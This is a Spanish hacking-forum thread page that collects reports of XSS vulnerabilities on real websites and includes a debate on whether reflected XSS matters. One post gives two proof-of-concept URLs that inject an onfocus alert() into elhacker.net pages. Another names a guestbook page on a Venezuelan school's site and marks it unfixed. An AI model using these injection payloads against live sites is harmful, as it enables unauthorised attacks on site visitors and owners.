Recopilatorio de Vulnerabilidades de XSS/SQLinjection

Iniciado por sirdarckcat, 26 Mayo 2008, 03:50 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas 1 2 3 4 5 6
Acciones del Usuario

engel lex

#50
12 Junio 2014, 08:42 AM
Cita de: Ceh en 12 Junio 2014, 08:30 AM
[youtube=640,360]C2VmExPbU5A[/youtube]

PETROLERA MAS POPULAR EN PERU

BY Security : Peruano y Muy PICHULON  ;D
esto se puede tomar como una vulnerabilidad xss? no está haciendo nada, solo cometieron el error de no filtrar la búsqueda, pero no es como si pudieran hacer algo real con eso, ya que no es permanente
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

dRak0

#51
12 Junio 2014, 15:16 PM
Cita de: engel lex en 12 Junio 2014, 08:42 AM
esto se puede tomar como una vulnerabilidad xss? no está haciendo nada, solo cometieron el error de no filtrar la búsqueda, pero no es como si pudieran hacer algo real con eso, ya que no es permanente

Es un XSS Reflejado. Requiere de ingenieria social para tomar provecho de esta falla.

Shell Root

#52
12 Junio 2014, 15:26 PM
@engel lex, recuendo aquellos tiempos que me dedicaba a buscar vulnerabilidades por todos lados, y recuerdo más aún una frase que lei que dice: "Una vulnerabilidad es tan limitada como tu quieras que sea", y un XSS llega hasta donde tu la quieras llevar.
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

daryo

#53
12 Junio 2014, 15:33 PM
Citar"Una vulnerabilidad es tan limitada como tu quieras que sea"
si no me equivoco esa frase es de xc3ll/vengador de las sombras  :silbar:
buenas

arthusu

#54
12 Junio 2014, 16:41 PM
Sitio web: http://www.elhacker.net/
Descubridor: arthusu
URL del aviso: http://foro.elhacker.net/
Fecha de descubrimiento: 08/06/2014
Fecha de notificación: 10/06/2014
Fecha de publicación: 10/06/2014
Arreglado: --
Vulnerabilidad: XSS reflejado
Informacion adicional: Blog Personal

Código [Seleccionar]
http://www.elhacker.net/geolocalizacion.html?host=google.com%22%20autofocus%20onfocus=%22alert%28%27arthusu%20was%20here%27%29%20/%3E


http://www.elhacker.net/whois.html?domain=187.233.84.51%22%20autofocus%20onfocus=%22alert%28%27arthusu%20was%20here%27%29

#!drvy

#55
12 Junio 2014, 16:42 PM
jaja buena esa arthusu =)

Saludos

Ceh

#56
12 Junio 2014, 23:27 PM
BROTHERS hermanos del UNDERGROUND como pueden ver esa web ya no tiene el xss reflejado ahora lo saco con la ayuda de mi addon de firerox ....... bueno y como que el tiro se hace mas dificil !

pero en el video hay scripts para juegar un buen rato :) saludos

Ceh

#57
12 Junio 2014, 23:43 PM Ultima modificación: 12 Junio 2014, 23:47 PM por Ceh
ACTUAL ------- ya no reflejado





;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-)

LaraAnons

#58
11 Septiembre 2015, 10:27 AM
Sitio web: http://www.aeroescuela.com.ve
Descubridor: LaraAnons
URL del aviso: http://www.aeroescuela.com.ve/correos.php
Fecha de descubrimiento: 11/09/2015
Fecha de notificación: 11/09/2015
Fecha de publicación: 11/09/2015
Arreglado: No
Información adicional: Se informo al administrador a través de la sección contacto de su pagina web
Código [Seleccionar]
http://www.aeroescuela.com.ve/librodevisitas.php
'El Arte de encontrar agujeros de seguridad no es mas que jugar a ser mas inteligente que el administrador'
By VenezuelanHackers
Imprimir
Ir Arriba Páginas 1 2 3 4 5 6
Acciones del Usuario